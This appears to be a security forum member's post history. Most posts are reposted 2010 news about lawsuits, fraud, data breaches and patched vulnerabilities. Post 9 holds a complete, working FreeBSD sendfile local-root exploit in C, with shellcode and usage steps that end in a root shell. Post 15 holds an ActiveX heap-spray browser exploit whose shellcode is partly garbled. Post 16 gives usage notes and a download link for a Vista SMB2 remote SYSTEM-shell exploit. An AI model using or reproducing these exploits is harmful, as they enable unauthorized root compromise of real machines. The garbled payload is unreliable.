Dragos

Moderators
  • Posts: 2658
  • Days Won: 74

Everything posted by Dragos

  1. Baidu, operator of China's largest search engine, is suing domestic security vendor 360 for unfair competition alleging a version of 360's security software flags both Baidu Toolbar and Baidu Address Bar as malware. The software tells users the plugins must be removed, Baidu said.

The suit, which was filed late last month, demands that 360 cease with its unfair practices. Baidu is also suing the company for 10 million renminbi (US$1.4 million) and is requesting that 360 issue public apologies on its websites as well as on several major news sites in China. Baidu declined to comment, but confirmed that the suit was accepted by Beijing Second Intermediate People's Court.

360, a major software security provider in China, responded to Baidu's claims in a statement on Friday. The company highlighted how search engines are sites for "swindling" and that they provide avenues for online threats to reach users. "In providing search results, Baidu has made no obligation toward protecting its users. Baidu is not a security company," 360 said. Whether or not Baidu's toolbars were flagged as malware is decided by user vote, the company added. "Baidu should check to see if these two software programs are operating correctly," 360 said.

This is not the first time that 360 has faced a lawsuit for unfair competition. In the past, it has also seen trouble with Yahoo China and other domestic companies. 360 was founded by Zhou Hongyi, who was originally the general manager of Yahoo China. Following his departure, Yahoo China sued Zhou's new company in 2006, alleging that 360's security software was identifying Yahoo Toolbar as malware. Yahoo China later won the case.

"This is a very old battleground," said Mark Natkin, managing director of Beijing-based Marbridge Consulting. "You will see a plethora of suits between different companies, not just in the anti-virus malware field, but also in types of toolbars. If you install one company's toolbar, it will disable the other company's toolbar."

Baidu sues Chinese security company | ITworld
  2. Police raided several locations in London and arrested nine people suspected of being members of a criminal ring, which stole millions of pounds from telecommunications companies. It looks like the ring was part of an international fraud network built around fraudulently acquired iPhones, inside which multiple gangs handled different aspects of the operation.

Police investigators claim that a group of West African fraudsters used cloned credit cards and stolen identities to buy iPhones and associated service subscriptions over the Internet. However, instead of being shipped to the addresses specified during purchase, the devices were delivered by corrupt drivers to an individual, who received almost 1,000 fraudulently bought iPhones in this manner.

The fraudster was taking the SIM cards out of the devices and was selling them to a gang, made up primarily of Pakistani nationals. This gang was shipping the cards to countries in the Middle East, Europe and Asia, where they were being placed inside special auto-dial devices configured to call local premium rate phone lines non-stop.

Through this method, the fraudsters managed to steal £1.2 million (over $1.8 million) in July from UK telecom provider O2. The company was paying money instantly to the premium rate number operators, but was not able to recover the funds from customers, who were supposed to own those SIM cards.

"Today we have struck at the very heart of a highly sophisticated criminal network that has been targeting the telecommunications industry to steal millions of pounds. "Our investigation found a crime gathering momentum. Each month more Sim cards were being used to make more phone calls to premium rate lines at more expense to the network provider," Detective Superintendent Bob Wishart, of City of London Police, commented for The Daily Telegraph.

The SIM-less iPhones were also being sold by a different gang in countries where operators don't block them, for as much as £450 ($700) a piece. During the raids Police found and seized hundreds of SIM cards, tens of new iPhones still in their boxes, cloned credit cards, as well as fake passports.

UK Police Dismantles International Telecom Fraud Ring - Softpedia
  3. A lawmaker has uncovered that 1,715 files containing South Korean military secrets, including war plans against North Korea, were stolen from infected Army-issued computers. Song Young-sun, a member of the South Korean parliament, who sits on the National Defense Committee, asked the Defense Ministry recently to release details about the security breach.

According to the information, the leak occurred between January and March this year, when 13 Army officers who were analyzing sensitive data had their computers infected with unspecified malware. Apparently the same threat was used in all cases and there are strong reasons to believe that there was a single source for the attacks. Obviously, South Korea suspects the involvement of its Northern neighbor. According to the military, this is the biggest leak since December 2005, when the country created the CyberSecurity Center to fight against such attacks.

Song Young-sun claims that even though the leaked war plans were old and no longer classified as secrets, they still pose a threat to national security. "The war operation plans, regardless of the secret-keeping period, can strike a blow to military operations when it gets into the hands of the enemy," the lawmaker told JoongAng Daily, a local newspaper. "Amid rising tension between the South and the North, the leaking or loss of military secrets by on-duty soldiers can have a serious effect on national security," he added.

South Korean officials are worried about the increasing number of such data breach incidents and also the numerous cases where military personnel are intentionally selling secrets. In the past we reported that information stealing malware was found on the computer networks of two major South Korean military equipment manufacturers. One of them, Hyundai Heavy Industries, was tasked with building the country's first AEGIS ships, the King Sejong the Great class of destroyers.

Malware Used to Steal South Korean Military Secrets - Softpedia
  4. Three Kenyan nationals, who defrauded four US states of almost $3.4 million by hijacking payments meant for legit vendors, were sentenced to prison on Thursday.

According to a Department of Justice press release, Robert M. Otiso, 36, of Elk River, Minn., was sentenced to 72 months in prison for conspiracy to commit mail and wire fraud; Paramena J. Shikanda, 35, of Minneapolis, was sentenced to 46 months in prison for conspiracy to commit money laundering; and Collins K. Masese, 21, of St. Paul, Minn., was sentenced to nine months in prison for conspiracy to commit money laundering.

The three individuals, all of Kenyan nationality, were found guilty of instrumenting a fraud scheme with the purpose of stealing money from several US states. Eventually, the defendants succeeded in diverting a total of $3.379 million from the governments of West Virginia, Kansas, Ohio and the Commonwealth of Massachusetts to their own bank accounts.

The operation involved setting up fake companies with names similar to those of large vendors like Deloitte Consulting, Unisys, Accenture or Electronic Data Systems, which provide various services to public and private institutions. The fraudsters then sent direct deposit authorization forms to the governments of numerous states suggesting that payments be made to the bank accounts associated with the rogue companies. Many governments realized that this was a scam, but the four previously mentioned didn't and sent money to the payment hijackers, who wired over $770,000 to Kenya.

"Today represents a victory for taxpayers. When the state itself is defrauded, we all suffer," said U.S. Attorney for the Southern District of West Virginia R. Booth Goodwin II. "Money taken from the public treasury is money not available for schools, roads, and police and fire departments. That is why this case was such a priority for my office," he explained.

Two other defendants, Michael M. Ochenge, 33, and Albert E. Gunga, 30, both of Minneapolis, have pleaded guilty to conspiracy to commit money laundering in connection to this scheme and will be sentenced next week.

Government Payment Hijackers Jailed - Softpedia
  5. Enter the id power_host and see.
  6. An industry body representing some of the biggest names in technology has hosted a closed-door meeting to discuss the future of the open internet. Public advocacy groups said such back-room dealings were detrimental.

The meeting follows the publication of a controversial plan by Google and Verizon that could allow net providers to give certain types of internet traffic priority over others. Consumer bodies called those proposals an "internet killer".

Last week a crowd of about 100 people marched to Google's headquarters in California to present boxes that they said contained 300,000 signatures upholding the values of net neutrality, a founding principle of the net that states that all web data is treated equally no matter where it comes from. The Google/Verizon plan suggests loopholes for mobile traffic and for some specialised content. Protestors urged the search giant to honour its famed "don't do evil" motto.

Premium net

The Google/Verizon scheme was announced after the US Federal Communications Commission (FCC) halted its own private sessions with internet companies and broadband providers to thrash out a consensus on the thorny subject of net neutrality. An agreement is central to the government's ambitions to provide high speed net access to every American by 2020.

Some internet service providers have said that the rise in internet traffic is putting an ever growing burden on the infrastructure of the net. As a result, they say, they should be able to charge more for heavy internet traffic or users or to carry traffic for bandwidth intensive services such as web video. Some critics have said net neutrality could stifle innovation.

On the other side of the debate, campaigners say net neutrality is a central tenet of the internet and guarantees free and open access to all. They argue that watering down the concept of net neutrality would pave the way for a two tiered internet, where the ability to pay would determine what services people could access.

'Openness principles'

Amid the present impasse, this latest meeting conducted by the Information Technology Industry Council (ITI) in Washington was held to try and find a way forward. It was said to involve representatives from Verizon, AT&T, Skype, Microsoft, Cisco and the Communications Workers of America.

In a statement to BBC News, the Council's president Dean Garfield said that "great progress has been made to develop internet openness principles in recent weeks" but more needed to be done "to ensure cross-sector support and to preserve internet access, innovation and investment. "This new effort will build on that work to arrive at something that can achieve both public and private sector support and strike the balance of encouraging continued innovation and investment in the internet."

In a recent interview with the BBC Mr Garfield said he believed the way forward was through a private sector initiative. "All the other solutions are ones that will take a fairly long time to effectuate. Private sector leadership is important here," said Mr Garfield at the time. Google did not attend but said that it was "an important issue and we support any attempt to move the ball forward".

Illegitimate negotiations

From the perspective of net neutrality supporters, news of another "set of secret negotiations" is worrying. "Industry talks that don't have any public process or consumer interest are not likely to result in good policy making that promotes the public interest," Aparna Sridhar, policy counsel for Free Press told BBC News. "Developing meaningful open internet rules is a job that is best done at the FCC with full public input from a diverse variety of stakeholders and not limited corporate closed door meetings."

That was a view backed by another advocacy group, Media Access Project. "These 'negotiations' are illegitimate," said Andrew Jay Schwartzman, the project's senior vice president. "They do not involve representatives of people who use the internet for free expression and commerce and they lack representation from the infant businesses that depend on an open internet to build the future Ciscos, Microsofts and Skypes."

Ms Sridhar of Free Press said the present confusion and ensuing rancour has been exacerbated by the FCC. "Unfortunately there is a bit of a vacuum right now because the Commission hasn't acted so various industry players are taking advantage and stepping in to fill that vacuum."

BBC News - Tech industry holds closed door talks on open internet
  7. The VideoLAN project has released version 1.1.3 of its popular VLC Media Player program, which includes a patch for a critical arbitrary code execution vulnerability. VLC is a powerful cross-platform multimedia player capable of playing most media formats natively, without the need for additional codecs. It is open source and distributed under the GNU General Public License.

The vulnerability addressed in version 1.1.3 is identified as CVE-2010-2937 and was discovered by security researchers from Fortinet's FortiGuard Labs. It stems from insufficient input validation in the program's TagLib plugin, which is used to parse ID3v2 tags containing meta-information about media files.

In order to exploit this flaw an attacker can trick a user into playing a file with a specially crafted ID3v2 tag, which would trigger a memory corruption error. The VLC developers say that in most scenarios this would only crash the application and result in a denial of service condition. However, VUPEN Security, one of the leading vulnerability research companies, rates the issue as critical and claims that it can also be exploited to execute arbitrary code.

"A vulnerability has been identified in VideoLAN VLC, which could be exploited by attackers to cause a denial of service or compromise a vulnerable system. "This issue […] could be exploited by attackers to crash an affected application or execute arbitrary code by tricking a user into opening a malicious media file (e.g. MP3)," the company writes in its advisory on the vulnerability.

VLC is available for a variety of platforms, including Windows, Mac, Linux, BSD or Solaris, but the VideoLAN Project only distributes precompiled binaries for Windows and Mac. VLC Media Player versions 1.1.2 down to 0.9.0 are affected by this flaw, so in addition to the new 1.1.3 version, the VLC developers have released patches for versions 1.1.2, 1.1.1, 1.1.0 and 1.0.6 that can be applied manually.

VLC Media Player 1.1.3 for Windows can be downloaded from here. VLC Media Player 1.1.3 for Mac can be downloaded from here.

Critical Vulnerability Fixed in VLC Media Player - Softpedia
  8. IDG News Service — The group responsible for managing the Internet's domain name system is asking Demand Media's eNom division for answers following complaints from Internet security groups.

ENom, the world's second-largest domain name registrar, came under fire last week in a report from HostExploit, a volunteer-run anti-malware research group. According to HostExploit, eNom is host to an unusually large number of malicious websites and is a preferred domain name registrar for pharmaceutical spammers.

ICANN now says that it is looking into the matter, according to Kurt Pritz, senior vice president of services with the Internet Corporation for Assigned Names and Numbers. Typically, ICANN advises people with information on illegal activity to take their complaints to law enforcement. "However, given the serious nature of some of the allegations made in the HostExploit report, we will ask eNom for their response and will follow up as appropriate," Pritz said in a statement, e-mailed to IDG News Service.

HostExploit says that some eNom resellers are violating ICANN rules by allowing customers to provide false Whois database information, not following ICANN deletion policy and generally not complying with their obligations as resellers. HostExploit's founder, who identifies himself using the pseudonym Jart Armin for fear of retribution, expects that ICANN will now put pressure on eNom to clean up its act. "I think that's a step in the right direction," he said via instant messaging. "They're not in compliance."

According to Armin, scammers are abusing the domain name registration system to make it extremely difficult to locate the domain nameservers used by the bad guys. That, in turn, makes it hard to put illegal networks of hacked, botnet computers out of operation. HostExploit also accuses eNom and its resellers of hosting an abnormally large number of malicious Web pages. Armin said that in terms of the total amount of bad activity, eNom is as bad as McColo. Based in San Jose, California, McColo was a notorious Internet service provider that was taken offline by its upstream service providers two years ago, after HostExploit published a report on the malicious activity on its network.

Demand Media declined to comment for this story.

HostExploit went public with its complaints about eNom in hopes of pressuring it into cleaning up its networks. ICANN's statement shows that it is getting some pressure, but typically it is the peripheral costs of malicious activity that force ISPs to act, according to Neil Daswani, chief technology officer with security vendor Dasient. "What's happening is the search engines and the browser companies are flagging and in some cases blacklisting websites," he said. Customers then call their service providers to find out what's happening, and dealing with those support calls, and the public relations fallout from public reports, can be expensive. "But basically it generates a support cost," Daswani said. "There's no better motivator in many cases than a financial motivator."

Robert McMillan covers computer security and general technology breaking news for The IDG News Service. Follow Robert on Twitter at @bobmcmillan. Robert's e-mail address is robert_mcmillan@idg.com

ICANN asks Demand Media for answers after report | ITworld
  9. FreeBSD mbufs() sendfile cache poisoning local privilege escalation exploit that throws a setuid shell in /tmp. Works on 7.x and 8.x builds prior to 12Jul2010.

/*
freebsd x86/x64 sendfile cache local root xpl v2
by Kingcope 2010
-- should h4x any freebsd 8.* and 7.* prior to 12Jul2010

tampers /bin/sh to contain a shellcode which does
'
chmod a+s /tmp/sh
chown root /tmp/sh
execve /tmp/sh2
'

how to use:

terminal 1:
$ cp /bin/sh /tmp/sh
$ cp /bin/sh /tmp/sh2
$ gcc cache.c -o cache

terminal 2:
$ nc -l 7030

terminal 1:
for i386 arch type:
$ ./cache i386
for amd64 arch type:
$ ./cache amd64

now wait
/bin/sh should be execed by the system as root in ~5 mins
then do:
$ /tmp/sh
# cleanup:
# cp -f /tmp/sh2 /bin/sh
# enjoy the root shell!
*/

// this juarez is now private on #darknet --
// http://www.youtube.com/watch?v=JtgInqNNpCI
// http://www.youtube.com/watch?v=IdbRWrY4QBI

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>      /* write() */
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>

int main (int argc, char *argv[])
{
    int s, f, k2;
    struct sockaddr_in addr;
    int flags;
    char str32[]=
        "\x31\xc0\x6a\x00\x68\x70\x2f\x73\x68\x68\x2f\x2f\x74\x6d\x89\xe3"
        "\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
        "\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
        "\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
    char str64[]=
        "\x48\x31\xc0\x99\xb0\x10\x48\xbf\xff\x2f\x74\x6d\x70\x2f\x73\x68"
        "\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
        "\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
        "\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
        "\xe7\x57\x52\x48\x89\xe6\x0f\x05";
    char buf[10000];
    char *p;
    struct stat sb;
    int n;
    fd_set wset;
    int64_t size;
    off_t sbytes;
    off_t sent = 0;
    int chunk;
    int arch = 3;

    if (argc != 2) {
        printf("define architecture i386 or amd64\n");
        return 1;
    }
    if (strcmp(argv[1], "i386") == 0) arch=1;
    if (strcmp(argv[1], "amd64") == 0) arch=2;
    if (arch == 3) {
        printf("define architecture i386 or amd64\n");
        return 1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    bzero(&addr, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(7030);
    addr.sin_addr.s_addr = inet_addr("127.0.0.1");
    n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
    if (n < 0) warn ("fail to connect");

    f = open("/bin/sh", O_RDONLY);
    if (f<0) warn("fail to open file");
    n = fstat(f, &sb);
    if (n<0) warn("fstat failed");
    size = sb.st_size;
    chunk = 0;

    flags = fcntl(f, F_GETFL);
    flags |= O_NONBLOCK;
    fcntl(f, F_SETFL, flags);

    while (size > 0) {
        FD_ZERO(&wset);
        FD_SET(s, &wset);
        n = select(f+1, NULL, &wset, NULL, NULL);
        if (n < 0) continue;

        if (chunk > 0) {
            sbytes = 0;
            if (arch == 1) n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
            if (arch == 2) n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
            if (n < 0) continue;
            chunk -= sbytes;
            size -= sbytes;
            sent += sbytes;
            continue;
        }

        chunk = 2048;
        memset(buf, '\0', sizeof buf);

        if (arch == 1) {
            for (k2=0;k2<256;k2++) { buf[k2] = 0x90; }
            p = buf;
            p = p + k2;
            memcpy(p, str32, sizeof str32);
            n = k2 + sizeof str32;
            p = buf;
        }
        if (arch == 2) {
            for (k2=0;k2<100;k2++) { buf[k2] = 0x90; }
            p = buf;
            p = p + k2;
            memcpy(p, str64, sizeof str64);
            n = k2 + sizeof str64;
            p = buf;
        }
        write(s, p, n);
    }
}
  10. Dragos

    Hello!

    Welcome to RST! Have fun! PS: Don't mind those guys above.
  11. Wikileaks co-founder Julian Assange responds to a BBC question about why it provides encrypted files for download. (Video: Frontline Club)

A novel use of encryption by whistle-blowing website Wikileaks could "challenge the legal system for years to come," according to an influential observer of the hacking community. Emmanuel Goldstein, editor of 2600 The Hacker Quarterly magazine, made his comments in reference to an encrypted file recently posted on the site. Some suspect the file - as yet unopened - contains further sensitive material. It has been reposted around the web and is available for anyone to download.

"If you release it in encrypted form, nobody really knows if you've released it or not - or even what the material is," Mr Goldstein told BBC News. "Then, if something happens to you, all it takes is the revelation of a simple spoken phrase known by a select group of people and everyone who has this mystery file now has all of the secrets."

'Uncrackable file'

Wikileaks recently published 76,000 secret US military logs detailing military actions in Afghanistan; an act the US authorities described as highly irresponsible. The website now says it will release 15,000 further sensitive documents, once it has completed a review aimed at minimising the risk that the release could put people's lives in danger. The site came under criticism after it released the first tranche for endangering the lives of informants or others named in the documents.

The release of the logs has led many to wonder what action the US might take against Wikileaks. Now it seems the site may be using encryption as insurance against legal and other threats to the information it holds. The insurance.aes256 file has been posted alongside the already published leaked war logs and can be downloaded by anyone. From the file name, it is believed that it has been encrypted using the AES256 algorithm - described as "extremely strong" by Professor Whitfield Diffie, of the Information Security Group at Royal Holloway University, London. Prof Diffie believes that AES256, which he says has been "extensively studied", could prove too tough even for US intelligence agencies to break.

While no-one knows what the insurance file contains, this has not prevented the contents becoming a matter of considerable speculation. Some suspect that the file contains a further leaked US military video, others that it is another tranche of US military logs - perhaps this time from Iraq. Or it could just be an imaginative bluff. Even the name of the directory in which it is held - "straw-glass-and-bottle" - has prompted discussion and debate online.

'Historical value'

Speaking at a recent event at London's Frontline Club, Wikileaks founder Julian Assange told attendees how the use of encryption could help overcome legal efforts to prevent publication. Mr Assange told the BBC that Wikileaks had often distributed encrypted material among its members in order to protect it. "We have over a long period of time distributed encrypted backups of material we have yet to release," he told the gathering. "All we have to do is release the password to that material and it is instantly available," he said.

By publishing the encrypted documents publicly, Mr Assange said Wikileaks was protecting material of historical value. "That duty to history is something that weighs heavily with us. If you had the Stasi archive in your pocket, that is a very heavy pocket indeed," he said. "We take precautions to make sure that sort of material is not going to disappear from history regardless of the sort of threats to this organisation."

Intelligence test

But with the "insurance file" Wikileaks has taken the unusual step of making an encrypted backup - if that is indeed what it is - publicly available online. Emmanuel Goldstein told the BBC: "Julian is smart. He always has a backup, which is the rule of thumb in this community." But he believes this goes further than just a need to preserve information. "It's a fascinating tactic and one which will challenge the legal system for years to come."

In Mr Goldstein's view, any attempt now to seize or prevent publication of material held by Wikileaks will be self-defeating because thousands of copies will already have been distributed world wide. It is, he says, "a tactic of intelligence to ward off the inevitable clampdown."

But Cindy Cohn, legal director of the Electronic Frontier Foundation, is less convinced the file represents a challenge to the US government. "I don't see it as a challenge, as much as being open about what's going on," she told the BBC. In Ms Cohn's view the idea of circulating encrypted copies of information to keep it safe is well-established. The tactic, according to Ms Cohn, has been used in the past by human rights groups and other organisations. She points to projects like Freenet, which use encryption and wide distribution of data to resist censorship. "Wikileaks is doing the same basic thing in a more directly political context and using encryption to allow them to be more open about it on the front end."

For Prof Diffie, the release of information in this way does open up interesting possibilities. "In a sense communications networks can be defined entirely by who has cryptographic keys, and I think a lot of networks will work that way in the future." That's a view which will not be good news for those trying to prevent groups sharing and publishing leaked material. "I think that the people who are trying to shut down Wikileaks are going to have to accept this as a fact of reality that cryptography allows you to do this kind of thing,"

http://www.bbc.co.uk/news/technology-11026659
  12. The Linux kernel has finally been purged of a privilege-escalation vulnerability that for at least half a decade allowed untrusted local users to gain unfettered rights to the operating system's most secure locations.

Maintainers of the central Linux component issued a patch last week that killed the bug, which allowed unprivileged users to gain root access. While Linux overlords stopped short of declaring it a security vulnerability, they stressed that the patch should be installed as soon as possible. “I'm tired of people trying to parse my words like I'm the Federal Reserve Chairman, just go update already,” developer Greg Kroah-Hartman said here.

The vulnerability was described as long ago as 2005 by researcher Gael Delalleu, but it remained largely overlooked until Rafal Wojtczuk, a researcher at Invisible Things Lab, started investigating related issues. In a PDF paper published Tuesday, he outlined a method that exploits the underlying bug using the Xorg server, which is instrumental in providing graphical user interface functions in Linux and is also referred to as the X server.

“One important aspect the attack demonstrates, is how difficult it is to bring security to a desktop platform, where one of the biggest challenges is to let applications talk to the GUI layer (e.g., X server in case of Linux), which usually involves a very fat GUI protocol (think X protocol, or Win32 GUI API) and a very complex GUI server, but at the same time keep things secure,” Joanna Rutkowska, a fellow security researcher at Invisible Things Lab blogged.

The memory-corruption bug stems from two memory regions of the X server that grow in the opposite directions in the address space, an attribute inherited from the x86 architecture designed by Intel. Attackers can force the two regions to collide, causing critical control data to be replaced with values that allow the X server to be hijacked. The bulletin accompanying the kernel fix described the implementation of “a guard page below a grow-down stack segment.”

It's a fairly exotic exploit, and can only be used locally, unless combined with an unrelated vulnerability. Still, its ability to remain unrepaired in the kernel for more than five years challenges the contention among many Linux boosters that the open-source platform is more secure because anyone can examine its source code. The lesson here is that the ability to do so doesn't guarantee that anyone will, even when they have the kind of generous guidance provided by Delalleu.

To be fair, some Linux distributions appear to have issued updates that closed the hole. SUSE Enterprise 9, 10, and 11 and some versions of openSUSE aren't vulnerable, according to H-Security, which said the SUSE security team issued a fix for the issue in 2004. But that only begs the question why such a fix was never incorporated in the kernel.

Linux kernel purged of five-year-old root access bug • The Register
  13. About 200 Windows applications are vulnerable to remote code-execution attacks that exploit a bug in the way the programs load binary files for the Microsoft operating system, a security researcher said Thursday. The critical vulnerability, which has already been patched in Apple's iTunes media player for Windows and VMware Tools, will be especially challenging to fix, because each application will ultimately need to receive its own patch, Mitja Kolsek, CEO of application security consultancy Acros Security, told The Register. He agreed with fellow researcher H D Moore, who on Wednesday said the critical vulnerability is trivial to exploit. At the time, Moore estimated 40 programs were vulnerable, but security experts from Slovenia-based Acros have found that about 200 of the 220 applications they've tested so far suffer from what they're calling the binary-planting bug. They have yet to complete their inquiry. “We are expecting that there should be many more,” Kolsek said. “We were just looking for those vulnerabilities that were exploitable in terms of the user double-clicking a document or doing a couple of things with the menu.” Acros researchers alerted Microsoft to the vulnerability about four months ago and have been working with members of its security team since then to coordinate a fix with the many affected parties. They had been working in secret until Wednesday, when word of the bug first leaked out, he said. He said Microsoft may be able to release some sort of temporary fix while something more permanent is pending. On Wednesday evening, a Microsoft spokeswoman said the company was investigating the report and would release more details when the inquiry was completed. This article will be updated if Microsoft has anything new to say. The only other software known to be affected is one or more components in Windows. 
Both Moore and Kolsek have declined to provide further details, except for a Twitter post from Moore that said the vulnerability may have been reported, in part, 10 years ago. Moore also tweeted that additional information would come on Monday. So far, what's known about the vulnerability comes mostly from an advisory Acros issued for the iTunes patch. The bug allows attackers to execute malicious code on Windows machines by getting the media player to open a file located on the same network share as a maliciously designed DLL file, it said. In some cases, the bugs can be exploited to execute EXE files and other types of binaries, as well, Kolsek said. Until a fix is in place users can lessen their exposure by blocking outbound SMB connections on ports 445 and 139 and on WebDAV, but Kolsek reiterated that will do nothing to prevent attacks that originate on local networks, and that can be a problem in large organizations, where compromises of one machine can be used as a jumping-off point to infect other PCs or workstations. “To own a single computer inside a network is very easy,” he said. “This type of vulnerability would make it really easy to get from this computer to owning some more interesting computers, for example, those belonging to admins. The external firewall would obviously not stop that.” Researcher: Code-execution bug affects 200 Windows apps - The Register
  14. It's probably from PowerHost.
  15. <html>
<br></br>
<br>. . . \ / </br>
<br>|\/| _. _| ** >< </br>
<br>| |(_](_] ||/ \ </br>
<br> ._| </br>
<br></br>
<br>RSP MP3 Player OCX ActiveX Buffer Overflow (heap spray)</br>
<br>By : MadjiX , Dz8(a)Hotmail.com</br>
<br>Discovered by Blake: [url=http://www.exploit-db.com/exploits/14309/]RSP MP3 Player OCX 3.2 ActiveX Buffer Overflow[/url]
<br>Greetings: His0k4 , Bibi-info , The g0bl!n (y) , sec4ever.com</br>
<br>Tested on Windows Xp Sp3 (Fr),with IE6</br>
<object classid='clsid:3C88113F-8CEC-48DC-A0E5-983EF9458687' id='target' ></object>
<script>
sh = unescape('%uc931???????'+ '??????????'+ '?????????'+ '??????????'+ '??????????'+ '??????????'+ '??????????'+ '??????????');
n=unescape('??');
h = 20;
s= h + sh.length;
while(n.length<s) n+=n;
f=n.substring(0,s);
b=n.substring(0,n.length-s);
while(b.length+s<0x40000) b=b+b+f;
memory=new Array();
for( counter=0; counter<250; counter++) memory[counter]= b + sh;
ret='';
for( counter=0; counter<=1000; counter++) ret+=unescape("%0a%0a%0a%0a");
target.OpenFile(ret);
</script>
</html>
  16. Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
---------------------------------------------------------------------
Exploited by Piotr Bania // [: www.piotrbania.com :]
Exploit for Vista SP2/SP1 only, should be reliable!
Tested on: Vista sp2 (6.0.6002.18005) Vista sp1 ultimate (6.0.6001.18000)
Kudos for: Stephen, HDM, Laurent Gaffie(bug) and all the mates I know, peace. Special kudos for prdelka for testing this shit and all the hosters.
Sample usage
------------
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876
Microsoft Windows [Version 6.0.6001]
Copyright © 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
When all is done it should spawn a port TARGET_IP:28876
RELEASE UPDATE 08/2010:
----------------------
This exploit was created almost a year ago and wasn't modified from that time whatsoever. The vulnerability itself has been patched for a long time already, so I have decided to release this little exploit. You use it at your own responsibility and I'm not responsible for any potential damage this thing can cause. Finally, I don't care whether it worked for you or not.
P.S. The technique itself is described here: Metasploit: SMB2: 351 Packets from the Trampoline
===========================================================================
Download: http://www.exploit-db.com/sploits/smb2_exploit_release.zip
  17. Young people may one day have to change their names in order to escape their previous online activity, Google boss Eric Schmidt has warned. Mr Schmidt told the Wall Street Journal he feared they did not understand the consequences of having so much personal information about them online. The firm has been busy bolstering its social networking presence recently. Google has acquired Slide and Jambool, two firms specialising in providing services for social networks. Slide is a gaming firm, whilst Jambool provides virtual currencies and payments. Google has also reportedly invested in another social network gaming firm called Zynga. Many believe the acquisitions are a sign that the search giant is about to launch another social network. Some commentators have already given the rumoured product a name: Google.me. It already owns two other social networks; Google Buzz, launched in February 2010 and its first foray known as Orkut. Buzz proved controversial when it linked up with people's Gmail accounts without asking their consent, meaning that their contacts were publicly visible. Young folly On his prediction that people may change their names, Mr Schmidt said: "I don't believe society understands what happens when everything is available, knowable and recorded by everyone all the time... I mean we really have to think about these things as a society." However, Mr Schmidt said that Google would likely store more personal information about its users in the future. At the moment, he said, "we know roughly who you are, roughly what you care about, roughly who your friends are." But, according to some experts, his concerns about the future are "overstated". "The idea that everything is stored online is not true," social media consultant Suw Charman-Anderson told BBC News. "It will be quite some time before that can become true because of the enormity of the internet." Archives such as Google Cache, which store older versions of websites, are selective, she added. 
"Google Cache is a snapshot taken periodically of some of the internet. It's very hit and miss at the moment." While companies specialising in "cleaning up" internet profiles already exist, Ms Charman-Anderson argued that social attitudes towards personal content on the web needed to change instead. "There's always a lag between the introduction of new technology and the development of a set of social norms around the behaviour that the technology encourages," she said. "As a society, we are just going to have to become a bit more forgiving of the follies of youth." BBC News - Google boss Eric Schmidt warns on social use of media
  18. The world's biggest chip maker, Intel, has agreed to buy the security technology firm, McAfee. Intel will pay $7.68bn (£5bn) in cash. Under the terms of the deal, Intel said it would pay $48 per share in cash for McAfee, almost 60% higher than its closing price on Wednesday. Through buying McAfee, a leading security technology firm, Intel intends to build security features into its microprocessors which go into products such as laptops and phones. The two companies said they had been working together for 18 months and that, should the takeover pass regulatory and shareholder approval, the first new products would be revealed early next year. Both boards of directors have unanimously approved the deal. However, the announcement took many analysts by surprise and sent McAfee's shares 58% higher to 47.21 US cents, close to the proposed purchase price. Intel shares, meanwhile, fell by almost 4% to 18.84 US cents. The deal is likely to reduce Intel's net earnings slightly in the first year. An Intel company statement said that the acquisition reflected that security was now a fundamental component of online computing. It added that today's security approach did not fully address the billions of new internet-ready devices, including mobile and wireless devices, TVs, cars, medical devices and cash machines. A key worry for technology users is the security threat posed by the fast-growing field of cloud computing - the ability to access, change and interact with data on any platform with a net connection, including smartphones. These online services require no software purchase and installation and most run via a browser, but there are concerns that storing personal data on a server somewhere in cyberspace could pose a major threat to the privacy of individuals. The president and chief executive of Intel, Paul Otellini, said in the past, energy efficiency and connectivity had defined computing requirements. 
In future security would become the "third pillar" that people demanded, he said. McAfee's president and chief executive, Dave DeWalt, said cyber attacks were a growing menace. He said: "The cyber threat landscape has changed dramatically over the past few years with millions of new threats appearing every month." McAfee, also based in Santa Clara, is one of the world's largest security technology companies with about $2bn in revenue last year. BBC News - Intel in $7.68bn McAfee takeover
  19. The UK's Human Genetics Commission website was hit by politically-motivated hackers on Tuesday, who defaced the site with a protest marking a Western plot to overthrow a post-WWII democratically elected leader in Iran. Dr Mohammed Mossadegh nationalised Iran's petroleum industry before a plot backed by the UK and the US led to his overthrow back in 1953. Quite why the Sun Army defaced the Human Genetics Commission website with digital graffiti is not immediately clear, but Jason Hart - senior European VP of CryptoCard, the security firm that brought the hack to our attention - said that in "order to deface the site they [the hackers] would have had to get admin access". Iran is something of a hotbed for politically-motivated hack attacks. The Iranian Cyber Army mounted a series of DNS hijacking attacks against first Twitter and later Chinese search engine Baidu in December 2009 and January. The attacks both resulted in the redirection of surfers. Baidu is suing US-based domain registrar Register.com (no relation) for alleged negligence in facilitating the attacks. Following the attack, the Human Genetics Commission website was restored to normal operation by Wednesday afternoon. The organisation has thus been able to return to its normal business of advising the UK government on the ethical implications and possible social effects of advances in genetics, such as genetic testing, cloning and stem cell research. Iranian activists deface UK genetics website - The Register
